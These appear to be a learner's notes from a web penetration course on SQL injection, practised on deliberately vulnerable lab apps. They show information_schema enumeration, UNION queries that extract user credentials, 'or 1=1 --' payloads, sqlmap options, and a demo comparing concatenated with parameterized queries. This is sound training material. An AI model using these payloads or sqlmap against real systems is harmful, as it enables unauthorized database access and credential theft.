
Study notes on "Complete Web Security Penetration Tutorial (40 episodes)" | SQL Injection Attacks and Defenses

Time: 2023-09-14 09:09:09

Source videos: Bilibili, "Complete Web Security Penetration Tutorial (40 episodes)"

While studying, I also reproduced the experiments shown in the videos; the lecture notes and lab notes are compiled below.

Harm of SQL injection

SQL basics review

Connect to the database

List databases: show databases

Switch to the dvwa database

List tables

View table structure

View table rows

select * from dvwa.users union select 1,2,3,4,5,6 is used to guess how many columns the statement returns; then select * from dvwa.users union select user_login,user_pass,1,2,3,4 from wordpress.wp_users; pulls out the wanted content (a condition that can never hold, such as where 1=3, can be added to filter out the unwanted original rows)

information_schema

use information_schema; its TABLES table stores the metadata of every database and table

select * from information_schema.TABLES\G lists every database and every table

select DISTINCT TABLE_SCHEMA from information_schema.TABLES; // equivalent to show databases

mysql> select DISTINCT TABLE_SCHEMA from information_schema.TABLES;
+--------------------+
| TABLE_SCHEMA       |
+--------------------+
| information_schema |
| bricks             |
| bwapp              |
| citizens           |
| cryptomg           |
| dvwa               |
| gallery2           |
| getboo             |
| ghost              |
| gtd-php            |
| hex                |
| isp                |
| joomla             |
| mutillidae         |
| mysql              |
| nowasp             |
| orangehrm          |
| personalblog       |
| peruggia           |
| phpbb              |
| phpmyadmin         |
| proxy              |
| rentnet            |
| sqlol              |
| tikiwiki           |
| vicnum             |
| wackopicko         |
| wavsepdb           |
| webcal             |
| webgoat_coins      |
| wordpress          |
| wraithlogin        |
| yazd               |
+--------------------+
33 rows in set (0.00 sec)
mysql>

select TABLE_SCHEMA,GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES GROUP BY TABLE_SCHEMA\G groups the tables by database and joins their names into one field. The "1 warning" in the output below is MySQL reporting that some GROUP_CONCAT results were cut off at group_concat_max_len (1024 bytes by default), which is why the joomla, orangehrm and tikiwiki rows end mid-name.

mysql> select TABLE_SCHEMA,GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES GROUP BY TABLE_SCHEMA\G
*************************** 1. row ***************************
            TABLE_SCHEMA: bricks
GROUP_CONCAT(TABLE_NAME): users
*************************** 2. row ***************************
            TABLE_SCHEMA: bwapp
GROUP_CONCAT(TABLE_NAME): users,movies,heroes,blog
*************************** 3. row ***************************
            TABLE_SCHEMA: citizens
GROUP_CONCAT(TABLE_NAME): logins
*************************** 4. row ***************************
            TABLE_SCHEMA: cryptomg
GROUP_CONCAT(TABLE_NAME): challenge4_users,challenge2_users,challenge2_articles
*************************** 5. row ***************************
            TABLE_SCHEMA: dvwa
GROUP_CONCAT(TABLE_NAME): users,guestbook
*************************** 6. row ***************************
            TABLE_SCHEMA: gallery2
GROUP_CONCAT(TABLE_NAME): g2_dataitem,g2_externalidmap,g2_imageblockdisabledmap,g2_movieitem,g2_pluginpackagemap,g2_schema,g2_tkoperatnparametermap,g2_accessmap,g2_customfieldmap,g2_exifpropertiesmap,g2_imageblockcachemap,g2_mimetypemap,g2_pluginmap,g2_rssmap,g2_tkoperatnmimetypemap,g2_watermarkimage,g2_comment,g2_entity,g2_group,g2_maintenancemap,g2_photoitem,g2_recoverpasswordmap,g2_tkoperatnmap,g2_usergroupmap,g2_childentity,g2_descendentcountsmap,g2_getid3propsmap,g2_lock,g2_permissionsetmap,g2_ratingmap,g2_thumbnailimage,g2_user,g2_cachemap,g2_derivativeprefsmap,g2_g1migratemap,g2_linkitem,g2_permalinksmap,g2_ratingcachemap,g2_sessionmap,g2_unknownitem,g2_animationitem,g2_derivativeimage,g2_filesystementity,g2_itemattributesmap,g2_pendinguser,g2_quotasmap,g2_sequencelock,g2_tkpropertymimetypemap,g2_albumitem,g2_derivative,g2_factorymap,g2_item,g2_multilangitemmap,g2_pluginparametermap,g2_sequenceid,g2_tkpropertymap,g2_accesssubscribermap
*************************** 7. row ***************************
            TABLE_SCHEMA: getboo
GROUP_CONCAT(TABLE_NAME): favourites,newshits,activation,ebhints,news,configs_groups,loginhits,tags_books,configs,gsubscriptions,tags_added,comments,groups,tags,captchahits,gfolders,session,bookmarkhits,folders,searches,bookexportimport
*************************** 8. row ***************************
            TABLE_SCHEMA: ghost
GROUP_CONCAT(TABLE_NAME): q
*************************** 9. row ***************************
            TABLE_SCHEMA: gtd-php
GROUP_CONCAT(TABLE_NAME): categories,itemstatus,tickler,items,projectstatus,itemattributes,projects,goals,projectattributes,context,nextactions,checklistitems,listitems,checklist,list,timeitems
*************************** 10. row ***************************
            TABLE_SCHEMA: hex
GROUP_CONCAT(TABLE_NAME): loginhistory
*************************** 11. row ***************************
            TABLE_SCHEMA: information_schema
GROUP_CONCAT(TABLE_NAME): COLUMN_PRIVILEGES,PARTITIONS,SCHEMA_PRIVILEGES,TRIGGERS,COLUMNS,KEY_COLUMN_USAGE,SCHEMATA,TABLE_PRIVILEGES,COLLATION_CHARACTER_SET_APPLICABILITY,GLOBAL_VARIABLES,ROUTINES,TABLE_CONSTRAINTS,COLLATIONS,GLOBAL_STATUS,REFERENTIAL_CONSTRAINTS,TABLES,CHARACTER_SETS,FILES,PROFILING,STATISTICS,EVENTS,PROCESSLIST,SESSION_VARIABLES,VIEWS,ENGINES,PLUGINS,SESSION_STATUS,USER_PRIVILEGES
*************************** 12. row ***************************
            TABLE_SCHEMA: isp
GROUP_CONCAT(TABLE_NAME): users
*************************** 13. row ***************************
            TABLE_SCHEMA: joomla
GROUP_CONCAT(TABLE_NAME): jos_vm_product_mf_xref,jos_menu_types,jos_vm_product_votes,jos_plugins,jos_vm_tax_rate,jos_stats_agents,jos_vm_category,jos_vm_export,jos_vm_zone_shipping,jos_categories,jos_core_acl_aro_groups,jos_vm_module,jos_vm_payment_method,jos_vm_product_files,jos_menu,jos_newsfeeds,jos_vm_product_type_parameter,jos_vm_state,jos_session,jos_vm_waiting_list,jos_vm_cart,jos_vm_currency,jos_bannertrack,jos_core_acl_aro,jos_vm_manufacturer_category,jos_vm_orders,jos_vm_product_download,jos_groups,jos_modules_menu,jos_vm_product_type,jos_vm_shopper_vendor_xref,jos_sections,jos_vm_vendor_category,jos_vm_auth_user_vendor,jos_vm_csv,jos_bannerclient,jos_content_rating,jos_vm_order_user_info,jos_vm_product_discount,jos_core_log_searches,jos_modules,jos_vm_product_reviews,jos_vm_shopper_group,jos_polls,jos_vm_vendor,jos_vm_auth_user_group,jos_vm_creditcard,jos_banner,jos_content_frontpage,jos_vm_order_status,jos_vm_product_category_xref,jos_core_log_items,jos_migration_backlinks,jos_vm_product_relations,jos_vm_shipping_rate,jos_
*************************** 14. row ***************************
            TABLE_SCHEMA: mutillidae
GROUP_CONCAT(TABLE_NAME): help_texts,credit_cards,captured_data,pen_test_tools,blogs_table,page_hints,balloon_tips,page_help,accounts,level_1_help_include_files,hitlog
*************************** 15. row ***************************
            TABLE_SCHEMA: mysql
GROUP_CONCAT(TABLE_NAME): db,help_topic,slow_log,user,columns_priv,help_relation,servers,time_zone_transition_type,help_keyword,procs_priv,time_zone_transition,help_category,proc,time_zone_name,general_log,plugin,time_zone_leap_second,func,ndb_binlog_index,time_zone,event,host,tables_priv
*************************** 16. row ***************************
            TABLE_SCHEMA: nowasp
GROUP_CONCAT(TABLE_NAME): accounts,level_1_help_include_files,hitlog,help_texts,credit_cards,youtubevideos,captured_data,pen_test_tools,blogs_table,page_hints,balloon_tips,page_help
*************************** 17. row ***************************
            TABLE_SCHEMA: orangehrm
GROUP_CONCAT(TABLE_NAME): hs_hr_employee_timesheet_period,hs_hr_geninfo,hs_hr_job_spec,hs_hr_config,hs_hr_leavetype,hs_hr_db_version,hs_hr_emp_children,hs_hr_nationality,hs_hr_rights,hs_hr_emp_jobtitle_history,hs_hr_users,hs_hr_emp_picture,hs_hr_employee_leave_quota,hs_hr_file_version,hs_hr_job_application_events,hs_hr_compstructtree,hs_hr_leave_requests,hs_hr_customer,hs_hr_emp_basicsalary,hs_hr_module,hs_hr_province,hs_hr_emp_history_of_ealier_pos,hs_hr_user_group,hs_hr_emp_passport,hs_hr_employee,hs_hr_ethnic_race,hs_hr_job_application,hs_hr_comp_property,hs_hr_leave,hs_hr_custom_import,hs_hr_emp_attachment,hs_hr_membership_type,hs_hr_project_admin,hs_hr_emp_emergency_contacts,hs_hr_unique_id,hs_pr_salary_grade,hs_hr_emp_member_detail,hs_hr_emp_work_experience,hs_hr_empstat,hs_hr_hsp_summary,hs_hr_language,hs_hr_custom_fields,hs_hr_eec,hs_hr_membership,hs_hr_project_activity,hs_hr_emp_education,hs_hr_timesheet_submission_period,hs_hr_emp_locations,hs_pr_salary_currency_detail,hs_hr_emp_us_tax,hs_hr_empreport,hs_hr_hsp_payment_reque
*************************** 18. row ***************************
            TABLE_SCHEMA: personalblog
GROUP_CONCAT(TABLE_NAME): t_posts,t_comments,t_referrers
*************************** 19. row ***************************
            TABLE_SCHEMA: peruggia
GROUP_CONCAT(TABLE_NAME): users,picdata
*************************** 20. row ***************************
            TABLE_SCHEMA: phpbb
GROUP_CONCAT(TABLE_NAME): phpbb_disallow,phpbb_privmsgs_text,phpbb_themes,phpbb_vote_results,phpbb_config,phpbb_privmsgs,phpbb_smilies,phpbb_vote_desc,phpbb_categories,phpbb_posts_text,phpbb_sessions,phpbb_users,phpbb_banlist,phpbb_posts,phpbb_search_wordmatch,phpbb_user_group,phpbb_auth_access,phpbb_groups,phpbb_search_wordlist,phpbb_topics_watch,phpbb_forums,phpbb_search_results,phpbb_topics,phpbb_words,phpbb_forum_prune,phpbb_ranks,phpbb_themes_name,phpbb_vote_voters
*************************** 21. row ***************************
            TABLE_SCHEMA: phpmyadmin
GROUP_CONCAT(TABLE_NAME): pma_pdf_pages,pma_history,pma_designer_coords,pma_column_info,pma_bookmark,pma_table_info,pma_table_coords,pma_relation
*************************** 22. row ***************************
            TABLE_SCHEMA: proxy
GROUP_CONCAT(TABLE_NAME): users,logs
*************************** 23. row ***************************
            TABLE_SCHEMA: rentnet
GROUP_CONCAT(TABLE_NAME): logins
*************************** 24. row ***************************
            TABLE_SCHEMA: sqlol
GROUP_CONCAT(TABLE_NAME): ssn,users
*************************** 25. row ***************************
            TABLE_SCHEMA: tikiwiki
GROUP_CONCAT(TABLE_NAME): tiki_quizzes,tiki_user_tasks_history,sessions,tiki_games,tiki_score,tiki_webmail_contacts,tiki_blog_activity,tiki_images_data,tiki_calendar_roles,tiki_sent_newsletters,tiki_live_support_events,tiki_stats,tiki_charts,users_permissions,tiki_mail_events,tiki_surveys,tiki_content,tiki_modules,tiki_tracker_item_attachments,tiki_directory_sites,tiki_page_footnotes,tiki_untranslated,tiki_faq_questions,tiki_private_messages,tiki_user_menus,galaxia_processes,tiki_forum_reads,tiki_quiz_stats_sum,tiki_user_tasks,messu_sent,tiki_galleries_scales,tiki_rss_modules,tiki_users_score,tiki_banning_sections,tiki_images,tiki_semaphores,tiki_calendar_locations,tiki_links,tiki_shoutbox_words,tiki_chart_items,users_objectpermissions,tiki_logs,tiki_survey_questions,tiki_comments,tiki_minical_topics,tiki_directory_search,tiki_object_ratings,tiki_tracker_fields,tiki_translated_objects,tiki_extwiki,tiki_preferences,galaxia_instances,tiki_user_mail_accounts,tiki_forum_attachments,tiki_user_taken_quizzes,messu_messages,tiki_galleries,tik
*************************** 26. row ***************************
            TABLE_SCHEMA: vicnum
GROUP_CONCAT(TABLE_NAME): unionresults,jottoresults,guessnumresults
*************************** 27. row ***************************
            TABLE_SCHEMA: wackopicko
GROUP_CONCAT(TABLE_NAME): admin_session,coupons,admin,conflict_pictures,comments_preview,comments,users,cart_items,pictures,cart_coupons,own,cart,guestbook
*************************** 28. row ***************************
            TABLE_SCHEMA: wavsepdb
GROUP_CONCAT(TABLE_NAME): transactions,messages,accounts,users
*************************** 29. row ***************************
            TABLE_SCHEMA: webcal
GROUP_CONCAT(TABLE_NAME): webcal_nonuser_cals,webcal_user_pref,webcal_entry_log,webcal_import_data,webcal_user_layers,webcal_entry_ext_user,webcal_import,webcal_user,webcal_entry,webcal_group_user,webcal_site_extras,webcal_config,webcal_group,webcal_report_template,webcal_categories,webcal_entry_user,webcal_report,webcal_view_user,webcal_asst,webcal_entry_repeats_not,webcal_reminder_log,webcal_view,webcal_entry_repeats
*************************** 30. row ***************************
            TABLE_SCHEMA: webgoat_coins
GROUP_CONCAT(TABLE_NAME): employees,customers,securityquestions,customerlogin,products,comments,payments,categories,orders,orderdetails,offices
*************************** 31. row ***************************
            TABLE_SCHEMA: wordpress
GROUP_CONCAT(TABLE_NAME): wp_categories,wp_options,wp_mypictures,wp_users,wp_mygprelation,wp_usermeta,wp_mygallery,wp_spreadsheet,wp_links,wp_posts,wp_linkcategories,wp_postmeta,wp_comments,wp_post2cat
*************************** 32. row ***************************
            TABLE_SCHEMA: wraithlogin
GROUP_CONCAT(TABLE_NAME): mail,users,stealth
*************************** 33. row ***************************
            TABLE_SCHEMA: yazd
GROUP_CONCAT(TABLE_NAME): yazdgroupperm,yazduserperm,yazdgroup,yazduser,yazdforumprop,yazdthread,yazdforum,yazdmessagetree,yazdfilter,yazdmessageprop,yazdmessage,yazdgroupuser,yazduserprop
33 rows in set, 1 warning (0.00 sec)
mysql>

select COLUMN_NAME from information_schema.columns; // column names of every table in every database (not useful on its own)

select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA='proxy' and TABLE_NAME='logs'; // fetch the column names of one specific database and table

mysql> select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA='proxy' and TABLE_NAME='logs'; 
+-------------+
| COLUMN_NAME |
+-------------+
| userid      |
| source      |
| target      |
| timestamp   |
+-------------+
4 rows in set (0.00 sec)
mysql>

SQL injection workflow

Error-based injection

Try entering ' to provoke an error; this shows whether the input reaches the query, but by itself yields no data

Boolean-based injection

The first ' closes the preceding condition; or 1=1 is an always-true condition; -- comments out everything that follows

UNION-based injection
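As an added example that is not from the course or this page, the two query styles behind the error, boolean and UNION notes above are run side by side against an in-memory SQLite stand-in for dvwa.users with constructed rows: the string-concatenated form accepts the ' or 1=1 -- input and the union select column-count probe, while the parameterized form compares the same input as a plain literal. The table layout and row values are assumptions for the demo, and SQLite stands in for MySQL.

```python
import sqlite3


def make_db():
    # Constructed stand-in for dvwa.users, reduced to three columns for the demo.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "hash-1"), (2, "gordonb", "hash-2")])
    return conn


def lookup_vulnerable(conn, user_input):
    # String concatenation: the input becomes part of the SQL text, so a quote
    # in it closes the literal and whatever follows is parsed as SQL.
    sql = "SELECT user_id, user FROM users WHERE user = '" + user_input + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_input):
    # Placeholder binding: the value travels beside the statement and is
    # compared as a plain string; it is never parsed as SQL.
    sql = "SELECT user_id, user FROM users WHERE user = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def compare(conn, user_input):
    # Run one input through both forms. An SQL error from the vulnerable form
    # (for example a UNION with the wrong column count) is returned as the
    # string "error", which is exactly what an error-based probe observes.
    try:
        vulnerable = lookup_vulnerable(conn, user_input)
    except sqlite3.OperationalError:
        vulnerable = "error"
    return {"vulnerable": vulnerable,
            "parameterized": lookup_parameterized(conn, user_input)}


if __name__ == "__main__":
    db = make_db()
    for inp in ["admin", "' or 1=1 --",
                "' union select 1,2,3 --", "' union select 1,2 --"]:
        print(repr(inp), compare(db, inp))
```

The mismatched three-column UNION errors in the concatenated form, the two-column one returns the injected row, and the parameterized form returns nothing for any of the probes.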

Time-based blind injection

The condition in front of it must be true

Automated injection with sqlmap

GET injection

Choose OWASP Mutillidae II and pick a page that does not require login for the injection

Enter any username and password, copy the resulting URL, and run sqlmap against it

Injection with sqlmap -u

When the scan succeeds, the results are saved to the specified directory

Adding --dbs to sqlmap lists all databases

List all users

Get the current user

Parameters, summarized

Fetch the values of given columns from a given table

Examples, summarized

POST injection

For injection pages that can only be reached with a cookie, pass --cookie=""

Data retrieval

Privilege escalation

Comprehensive example